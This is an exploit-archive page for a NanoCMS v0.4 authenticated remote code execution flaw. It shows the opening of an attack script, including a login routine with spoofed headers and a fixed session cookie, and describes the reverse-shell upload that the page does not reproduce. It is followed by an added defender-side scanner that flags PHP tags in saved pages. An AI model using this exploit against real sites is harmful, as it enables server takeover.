Exploits / Vulnerability Discovered : 2022-08-01 |
Type : webapps |
Platform : php
This exploit/vulnerability, NanoCMS v0.4 Remote Code Execution (RCE) (Authenticated), is provided for educational purposes only; if you use it, you do so at your own risk.
[+] Code ...
# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-26
# Exploit Author: p1ckzi
# Vendor Homepage: https://github.com/kalyan02/NanoCMS
# Version: NanoCMS v0.4
# Tested on: Linux Mint 20.3
# CVE: N/A
#
# Description:
# This script uploads a PHP reverse shell to the target.
# NanoCMS does not sanitise the data of an authenticated user while creating
# webpages. Pages are saved with .php extensions by default, allowing an
# authenticated attacker access to the underlying system:
# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt

import re
import secrets
import sys

import requests

# Note: `arguments` (the parsed command-line options) and `settings` (the
# colour and indicator strings used in the status messages) are defined in
# the part of the script that is not reproduced on this page.


# appends a '/' if not supplied at the end of the address.
def address_check(address):
    check = re.search('/$', address)
    if check is not None:
        print('')
    else:
        arguments.option.address += "/"


# creates a new filename for each upload.
# errors occur if the filename is the same as a previously uploaded one.
def random_filename():
    random_filename.name = secrets.token_hex(4)


# note: after a successful login, credentials are saved, so further reuse
# of the script will most likely not require correct credentials.
def login(address, user, passwd):
    post_header = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
                      "Gecko/20100101 Firefox/91.0",
        "Accept": "text/html,application/xhtml+xml,"
                  "application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": "",
        "Connection": "close",
        "Referer": f"{arguments.option.address}data/nanoadmin.php",
        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
        "Upgrade-Insecure-Requests": "1",
    }
    post_data = {
        "user": f"{user}",
        "pass": f"{passwd}"
    }
    url_request = requests.post(
        address + 'data/nanoadmin.php?',
        headers=post_header,
        data=post_data,
        verify=False,
        timeout=30
    )
    signin_error = url_request.text
    if 'Error : wrong Username or Password' in signin_error:
        print(
            f"{settings.c1}{settings.i2}could not "
            f"sign in with {arguments.option.user}/"
            f"{arguments.option.passwd}.{settings.c0}"
        )
        sys.exit(1)
    else:
        print(
            f"{settings.c2}{settings.i1}logged in successfully."
            f"{settings.c0}"
        )

# (The remainder of the script is not reproduced on this page.)
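As an added defender-side check (not part of the original exploit, nor of NanoCMS itself), the following Python walks a directory of saved NanoCMS pages and flags any whose content contains a PHP open tag, which is what turns a page saved as .php into executable code. The pages directory path and file layout are assumptions, and the sample pages are constructed inline.

```python
"""Defender-side check: flag NanoCMS page files that contain PHP code.
NanoCMS saves pages with a .php extension, so any PHP open tag in page
content runs on the server. Directory layout is an assumption."""
import os
import re
import tempfile

# Strong indicator: full open tag or echo tag, any letter case.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Weak indicator: bare short tag (needs short_open_tag); skips <?xml.
SHORT_TAG = re.compile(rb"<\?(?!xml)\s")

def scan_page_file(path):
    """Return 'php', 'short-tag' or None for one saved page."""
    with open(path, "rb") as fh:
        data = fh.read()
    if PHP_TAG.search(data):
        return "php"
    if SHORT_TAG.search(data):
        return "short-tag"
    return None

def scan_pages_dir(root):
    """Walk root and return sorted (relative path, verdict) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            verdict = scan_page_file(full)
            if verdict:
                findings.append((os.path.relpath(full, root), verdict))
    return sorted(findings)

def demo():
    """Constructed sample pages (not real NanoCMS data) in a temp dir."""
    samples = {
        "about.php": b"<h1>About</h1><p>Plain HTML page.</p>",
        "news.php": b"<p>hi</p><?PHP echo 'injected'; ?>",
        "x.php": b"<? echo 'short tag'; ?>",
        "feed.php": b"<?xml version='1.0'?><rss/>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_pages_dir(root)

if __name__ == "__main__":
    for rel, verdict in demo():
        print(f"{verdict:10} {rel}")
```

Run it against the real pages folder after an incident to find pages that should be plain HTML but now carry code; a clean install should return an empty list.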